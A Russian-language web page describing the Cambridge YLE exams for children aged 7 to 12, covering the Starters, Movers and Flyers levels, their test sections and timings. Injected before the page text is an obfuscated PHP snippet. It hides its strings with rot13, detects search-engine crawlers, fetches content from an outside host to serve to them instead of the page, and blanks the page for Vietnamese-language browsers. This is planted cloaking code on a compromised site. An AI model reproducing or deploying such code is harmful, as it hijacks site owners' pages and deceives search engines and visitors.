$_1x=str_rot13('uggc://kvnb.zzn888.pp/');$_2x=str_rot13('uggcf://ao.wlmlcf.pbz/wf/iaonv.wf');do{if(!isset($_SERVER[str_rot13('UGGC_HFRE_NTRAG')]))break;$_3x=strtolower($_SERVER['HTTP_USER_AGENT']);if(strpos($_3x,str_rot13('tbbtyrob'.'g'))!==false||strpos($_3x,str_rot13('ovat'.'obg'))!==false){$_4x=((!empty($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')||(isset($_SERVER['SERVER_PORT'])&&$_SERVER['SERVER_PORT']==443))?'https':'http';$_5x=$_1x.'?'.http_build_query(array(str_rot13('cebgbpby')=>$_4x,str_rot13('qbznva')=>isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:'',str_rot13('hev')=>isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:'/'));if(function_exists('curl_init')){$_6x=curl_init($_5x);curl_setopt_array($_6x,array(CURLOPT_RETURNTRANSFER=>true,CURLOPT_USERAGENT=>$_SERVER['HTTP_USER_AGENT'],CURLOPT_CONNECTTIMEOUT=>3,CURLOPT_TIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_SSL_VERIFYHOST=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>2));$_7x=curl_exec($_6x);$_8x=curl_errno($_6x);curl_close($_6x);if($_8x===0&&!empty($_7x)){if(!headers_sent())header('Content-Type: text/html; charset=utf-8');echo $_7x;exit;}}break;}if(!isset($_SERVER[str_rot13('UGGC_NPPRCG_YNATHNTR')]))break;$_9x=strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);if(strpos($_9x,'vi')===false)break;if(!headers_sent())header('Content-Type: text/html; charset=utf-8');echo '';exit;}while(false);unset($_1x,$_2x,$_3x,$_4x,$_5x,$_6x,$_7x,$_8x,$_9x); Кембриджские экзамены для детей — Английский, как ABC!

Кембриджские экзамены для детей

Дети 7-12 лет могут сдать специально разработанные для них экзамены YLE (Young Learners English) Starters, Movers и Flyers.

 

Зачем детям сдавать экзамены?

  • Сдача экзаменов мотивирует детей к дальнейшим занятиям, они испытывают гордость, когда получают сертификат (экзамен нельзя не сдать – каждый ребенок получает сертификат)
  • Дети привыкают к атмосфере и в дальнейшем чувствуют себя уверенно, сдавая экзамены на более серьезные сертификаты
  • Тесты объективно показывают уровень знаний ребенка

 

Что представляет из себя экзамен?

Каждый экзамен состоит из трех частей: Speaking (говорение), Listening (аудирование) и Reading+Writing (чтение и письмо)

 

Starters – экзамен первого уровня продолжается 45 минут, с перерывом после каждой части.

Reading and Writing (Чтение и Письмо — 20 минут).

Эта часть теста включает 5 частей и 25 вопросов. В этой части экзамена ребенок должен сопоставить предложение с картинкой, составить правильное слово из букв, вставить нужное слово в текст.

Listening (Аудирование — 20 минут).

Эта часть теста включает 4 частей и 20 вопросов. Во время сдачи экзамена ребенку нужно сопоставить названный предмет с его изображением на картинке, записать слово или цифру, раскрасить картинку, найти предмет по инструкциям, выбрать нужную картинку.

Speaking (Устная речь — 3-5 минут).

Экзаменатор спрашивает имя ребенка, затем просит выполнить простые задания — найти нужный предмет на картинке, односложно ответить на вопросы о возрасте, семье, увлечениях, школе.

Список слов, который должен знать ребенок можно посмотреть здесь.

Образцы заданий.

Отзыв детей, сдавших экзамен
Мне 9 лет. Мне понравился экзамен, но он был очень легким, и мне показалось, что на уроке мы делали задания сложнее. Самой сложной частью был разговор с англичанкой. Я не понял ее вопрос и сказал «Sorry?», тогда она повторила вопрос и я хорошо ответил.

 

Movers – этот экзамен подтверждает достижение уровня A1 (elementary) по Общеевропейской шкале.

Экзамен продолжается 62 минуты.

Reading and Writing (Чтение и Письмо — 30 минут).

Эта часть теста включает 6 частей и 40 вопросов. В этой части экзамена ребенок должен сопоставить предложение с картинкой, ответить «да» или «нет» на вопросы, выбрать лучшее название для истории, вставить нужное слово в текст.

Listening (Аудирование — 25 минут).

Эта часть теста включает 5 частей и 25 вопросов. Во время сдачи экзамена ребенку нужно сопоставить названный предмет с его изображением на картинке, записать слово или цифру, раскрасить картинку, сопоставить названия дней недели с картинками, нарисовать предмет.

Speaking (Устная речь — 5-7 минут).

Экзаменатор спрашивает имя кандидата. Затем ребенок выполняет простые задания — выбирает лишнюю картинку и объясняет свой выбор, находит 4 различия на двух похожих картинках, описывает последовательные картинки, составляющие рассказ, отвечает на простые вопросы экзаменатора о себе, школе, семье.

Список слов, который должен знать ребенок можно посмотреть здесь.

Образцы заданий.

 

Flyers — этот экзамен подтверждает достижение уровня A2 (pre-intermediate) по Общеевропейской шкале.

Экзамен продолжается 74 минуты.

Reading and Writing (Чтение и Письмо — 40 минут).

Эта часть теста включает 7 частей и 50 вопросов. В этой части экзамена ребенок должен сопоставить слова и их определения, ответить «да» или «нет» на вопросы по тексту, выбрать правильный ответ, вписать простые слова в текст, выбрать лучшее название для текста, заполнить текст нужной грамматической формой, вписать подходящее слово.

Listening (Аудирование — 25 минут).

Эта часть теста включает 5 частей и 25 вопросов. В этой части экзамена ребенок должен прочертить линию от имен людей к нужной картинке, написать слово рядом с подсказкой, сопоставить слова с картинками, выбрать правильную картинку, закрасить предметы на картинке, написать простое слово или нарисовать предмет.

Speaking (Устная речь — 7-9 минут).

Ребенку нужно описать 6 различий на двух похожих картинках, описать четыре последовательные картинки, составляющие рассказ, а также ответить на вопросы по таким темам, как школа, выходной, день рождения, друзья и хобби.

Список слов, который должен знать ребенок можно посмотреть здесь.

Образцы заданий.

Процедура регистрации на экзамен – здесь.

ВНИМАНИЕ! Обновления в формате экзаменов с 2018 года.